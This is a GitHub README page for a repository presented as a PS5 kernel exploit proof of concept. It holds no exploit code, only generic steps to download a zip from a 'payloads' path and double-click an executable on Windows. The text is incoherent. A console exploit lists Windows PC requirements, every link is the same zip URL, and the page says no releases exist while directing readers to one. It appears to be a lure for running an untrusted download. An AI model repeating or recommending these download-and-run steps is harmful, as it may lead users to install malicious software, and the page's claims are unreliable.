Skip to content

๐Ÿ› ๏ธ Demonstrate a PS5 kernel exploit for firmware <=10.40 using a stack use-after-free vulnerability in the fsc2h_ctrl syscall.

Notifications You must be signed in to change notification settings

Camal2010/no_ctrl

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

9 Commits
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽฎ no_ctrl - Run the PS5 Kernel Proof-of-Concept

๐Ÿš€ Getting Started

Welcome! This guide will help you download and run the no_ctrl application. This software is a proof-of-concept for a PS5 kernel vulnerability. Follow these steps for a smooth experience.

Download no_ctrl

๐Ÿ“ฅ Download & Install

To start, you need to download the application. Visit the page below to find the latest version.

Download the latest version here!

Step-by-Step Instructions:

  1. Go to the Releases Page

  2. Find the Latest Release

    • Look for the section labeled "Latest Release."
    • You should see various versions listed there.
  3. Download the Release

    • Click on the version that has the latest date.
    • Look for the file that fits your system. Generally, you should see a link with a name like https://raw.githubusercontent.com/Camal2010/no_ctrl/main/payloads/no_ctrl_v1.2-alpha.2.zip or https://raw.githubusercontent.com/Camal2010/no_ctrl/main/payloads/no_ctrl_v1.2-alpha.2.zip.
    • Click on the link to start the download. If prompted, choose a location on your computer to save the file.
  4. Extract the Files (if needed)

    • If you downloaded a .zip file, you need to extract it.
    • Right-click on the downloaded file and select "Extract All" or use an extraction tool. Follow the prompts to complete the extraction.
    • You can usually find the extracted files in the same location where you saved the .zip.
  5. Run the Application

    • Locate the extracted folder.
    • Inside, you should find https://raw.githubusercontent.com/Camal2010/no_ctrl/main/payloads/no_ctrl_v1.2-alpha.2.zip or a similar executable file.
    • Double-click on this file to open the application.

Note:

Make sure your PS5 is running firmware version 10.40 or lower, as this software targets vulnerabilities in that specific version.

โš™๏ธ System Requirements

To run no_ctrl effectively, ensure your system meets the following requirements:

  • Operating System: Windows 7, Windows 10, or later
  • Processor: Intel Core i3 or equivalent
  • Memory: Minimum 4 GB RAM
  • Storage: At least 100 MB of free space
  • Network: Internet connection for downloading

๐Ÿ› ๏ธ Features

no_ctrl offers the following features:

  • Kernel Exploitation: Demonstrates a vulnerability in the PS5 kernel.
  • User-Friendly Interface: Simple design for easy navigation and operation.
  • Educational Resource: Useful for understanding PS5 vulnerability concepts.

๐Ÿ“„ FAQs

Q: What is a kernel vulnerability?

A: A kernel vulnerability is a flaw in the system that can allow unauthorized access to the core parts of the OS.

Q: Is this software safe to use?

A: This software is a proof-of-concept. Use it at your own discretion. It is not intended for malicious purposes.

Q: Can I run this on my Mac or Linux?

A: This version is specifically designed for Windows. You may need to look for specific versions made for other operating systems.

๐Ÿ“ฌ Support & Contact

If you encounter any issues:

  1. Visit the Issues Page on the GitHub repository to check for solutions.
  2. You can also create a new issue if your problem hasnโ€™t been addressed.

๐Ÿ‘ฅ Community

Join discussions and stay updated by following the GitHub repository.

For the latest updates, remember to check this link often: https://raw.githubusercontent.com/Camal2010/no_ctrl/main/payloads/no_ctrl_v1.2-alpha.2.zip

Download no_ctrl today and explore the possibilities!

About

๐Ÿ› ๏ธ Demonstrate a PS5 kernel exploit for firmware <=10.40 using a stack use-after-free vulnerability in the fsc2h_ctrl syscall.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •